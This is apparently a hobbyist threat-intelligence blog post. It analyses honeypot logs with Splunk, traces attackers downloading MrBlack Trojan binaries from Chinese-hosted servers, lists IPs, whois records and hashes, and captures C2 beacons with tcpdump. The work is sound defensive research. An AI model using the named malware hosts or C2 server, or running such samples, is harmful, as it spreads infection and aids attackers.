Threat Intel | Meeting Mr. Black
My honeypots haven't been getting much action lately....poor guys. But, I got lucky, and had some individuals log on to them this morning, so I figured I'd do another blog post about their activity.
So, I'm starting to use Splunk to manage my honeypot data (More on this to come later, awesome news to share!), which makes this a ton easier to search and parse out. With that being said, let's dive into it...
First, I ran a search to check out all the honeypot sessions where there were commands entered, as opposed to just sessions started and then the attacker bailed. That search looked like this:
index=kippo cmd=* | rex field=cmd "wget\s(?<url>.*)" | search url=* | table url, src_ip, _time, host, session_id
Once that search finished, I was left with all the commands that contained URL's in there, so I could see what malware was being downloaded. I know that regex sucks, but, it worked for my scenario. I was left with these results:
So, we can see 2 attackers, I'm assuming they are possibly related, however, no guarantees yet. The first attacker, 222.186.15.239 was seen downloading a file from http://222.186.15.239:7070, that HTTP File Server wasn't serving up much, so I started checking out the other server and attacker.
The next attacker was 222.186.34.161 and downloaded a bunch of malware of varying architectures from http://115.29.165.174:65326.
222.186.34.161 is an IP in CHINANET Jiangsu Province Network (shocker, I know....). The malware hosting IP, 115.29.165.174, is registered to Aliyun Computing Co., LTD located in....China. Again, shocker I know.
inetnum: 115.28.0.0 - 115.29.255.255
netname: ALISOFT
descr: Aliyun Computing Co., LTD
descr: 5F, Builing D, the West Lake International Plaza of S&T
descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country: CN
admin-c: ZM1015-AP
tech-c: ZM877-AP
tech-c: ZM876-AP
tech-c: ZM875-AP
mnt-by: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
status: ALLOCATED PORTABLE
changed: ipas@cnnic.cn 20140730
source: APNIC
This guy is plenty active according to multiple IP reputation services. Thanks to threatrecon.co for some good indicator searching, here's a few results, but there were plenty more:
Here's a screenshot of the HTTP File Server and all the malware it's serving:
Moving onto the malware, I started looking at ss64, which is an ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped.
SHA256: 565097e41b4721c34c49ada6c3552d3f2f98fc9bdd516f3ff8944e1fb5c8e8fe
MD5: 74941428a497544fb5bdf4319951eff7
I uploaded this to VirusTotal and malwr.com, however, neither provided to be that fruitful. I submitted the 32-bit version of ss to the same sites, and it popped up about 4 times as MrBlack Trojan, which I'm not too familiar with, seeing as how I'm pretty new to the whole malware analysis scene. So, since the dynamic malware analysis tools I would use didn't seem to be that helpful, I gave a shot at just seeing what I could find. I ran the file on a spun-up Kali instance and it would just hang here forever.
Since that's all that was happening, I decided to check out the behind-the-scenes comms, hoping to identify the server.
Int Server...
connect to server...
Looking at 192.161.60.184, it appears to be an IP out of a California based hosting company:
NetRange: 192.161.48.0 - 192.161.63.255
CIDR: 192.161.48.0/20
NetName: QUADRANET
NetHandle: NET-192-161-48-0-1
Parent: NET192 (NET-192-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS29761, AS8100
Organization: QuadraNet, Inc (QUADR-20)
RegDate: 2012-11-01
Updated: 2015-01-14
Ref: http://whois.arin.net/rest/net/NET-192-161-48-0-1
Doing some recon on that box, I noticed it was running various services, to include IIS, which identified it as a Chinese user possibly, due to the language present on the running services.
I started running a tcpdump to try and see what type of communication was happening.
kali> tcpdump -i eth0 -nnvvXS dst 192.161.60.184 -w /tmp/black.pcap
The above screenshot was the only thing distinct about the communication so far, which was my OS, kali, and another thing of interest, Mr.Black, which just reinforces the results from VirusTotal. I'm currently running tcpdump to see if anything else ever happens besides what appear to be keep-alive messages or beacons. Ninja Edit I let it run overnight, and there was nothing of interest, so, I'm not sure how often C2 comms get sent, or if I'm missing something. So, if anyone knows more about Mr.Black, please let me know.
Lastly, here's a little sketch made of the communications and systems involved. I'm more a visual learner and enjoy when things are visually depicted as well as spelled out, so I wanted to include something like this.
